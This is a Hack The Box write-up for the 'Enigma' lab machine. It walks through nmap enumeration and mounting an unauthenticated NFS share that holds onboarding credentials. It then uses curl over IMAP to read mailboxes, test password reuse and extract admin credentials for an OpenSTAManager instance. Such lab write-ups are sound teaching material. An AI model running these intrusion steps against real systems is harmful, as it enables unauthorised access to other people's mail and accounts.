Hack The Box - HTB Enigma Writeup - Easy - Weekly - June 27th, 2026

1337 Sheets
1337 Sheets
·
Hack The Box - HTB Enigma Writeup - Easy - Weekly - June 27th, 2026

Placeholders used

Token Meaning
$TARGET the target machine's IP
$ATTACKER your VPN (tun0) IP
$LPORT your reverse-shell listener port (e.g. 9001)
[REDACTED] value intentionally removed

0. Setup & a network gotcha

Add the vhosts (discovered along the way: enigma.htb, mail001.enigma.htb,
support_001.enigma.htb):

echo "$TARGET enigma.htb mail001.enigma.htb support_001.enigma.htb" | sudo tee -a /etc/hosts

This is the classic HTB tun0 MTU black-hole: large packets (TLS ClientHello

  • certificate) get dropped on the VPN. Fix by lowering the interface MTU:
sudo ip link set dev tun0 mtu 1300

After this, everything worked. If IMAP/HTTPS to a box hangs while plain TCP
connects, suspect MTU first.

1. Enumeration

nmap -p- --min-rate 2000 -sV -sC $TARGET

A mail-server-themed host:

22/tcp    ssh        (publickey only)
80/tcp    http       nginx (Ubuntu)
110/tcp   pop3
111/tcp   rpcbind
143/tcp   imap
993/tcp   imaps
995/tcp   pop3s
2049/tcp  nfs
+ high ports → mountd / nlockmgr / status (NFS machinery)

Reading the surface: a full mail stack (POP3/IMAP + TLS), NFS/rpcbind
(always worth an anonymous check), and a web server. No SMTP exposed — mail is
delivered locally only.

2. NFS → onboarding credentials

showmount -e $TARGET
# Export list for $TARGET:
# /srv/nfs/onboarding *

The * means it is exported to everyone with no authentication. Mount and
read it:

sudo mkdir -p /mnt/onboarding
sudo mount -t nfs -o vers=3,nolock $TARGET:/srv/nfs/onboarding /mnt/onboarding
ls -la /mnt/onboarding
# -rw-r--r-- 1 root root 1751 ... New_Employee_Access.pdf

The PDF is an IT "New Employee System Access" sheet:

Employee : Kevin Mitchell
Webmail  : http://mail001.enigma.htb
Username : kevin
Password : Enigma2024!

3. Webmail + password reuse → OpenSTAManager creds

The webmail (mail001.enigma.htb) is Roundcube 1.6.16. The version is leaked
in the login page's inline JS (rcversion: 10616 = version2int("1.6.16")).
1.6.16 is the patched release — it fixes the whole 2026 Roundcube CVE batch —
so chasing a Roundcube RCE is a deliberate dead end. The credentials are
real, though, and the onboarding password is a corporate default that is
reused.

Drive IMAP directly with curl (no web UI needed). First log in as kevin and
list his folders:

curl -s --url "imaps://$TARGET/" --user "kevin:Enigma2024!" -k
# * LIST (...) "/" Sent / Trash / INBOX

Where sarah comes from: read kevin's inbox. His only message is a welcome
email from sarah@enigma.htb ("I'm Sarah from the Accounts department…"),
which is how we learn a second user/mailbox exists:

curl -s --url "imaps://$TARGET/INBOX/;MAILINDEX=1" --user "kevin:Enigma2024!" -k

From    : sarah@enigma.htb
Subject : Welcome to Enigma Corp, Kevin!
...
I'm Sarah from the Accounts department. I'll be your point of contact ...

Now test the reused onboarding password against sarah's mailbox — it works:

curl -s --url "imaps://$TARGET/" --user "sarah:Enigma2024!" -k
# * LIST (...) "/" Trash / INBOX        ← auth succeeds → password reuse confirmed

Read sarah's inbox:

curl -s --url "imaps://$TARGET/INBOX/;MAILINDEX=1" --user "sarah:Enigma2024!" -k

Subject : Re: OpenSTAManager Access Request
URL      : http://support_001.enigma.htb
Username : admin
Password : Ne3s4rtars78s

A third vhost and admin credentials for OpenSTAManager (an open-source
management / e-invoicing app). SSH is publickey-only, so reuse helps only on the
mail service.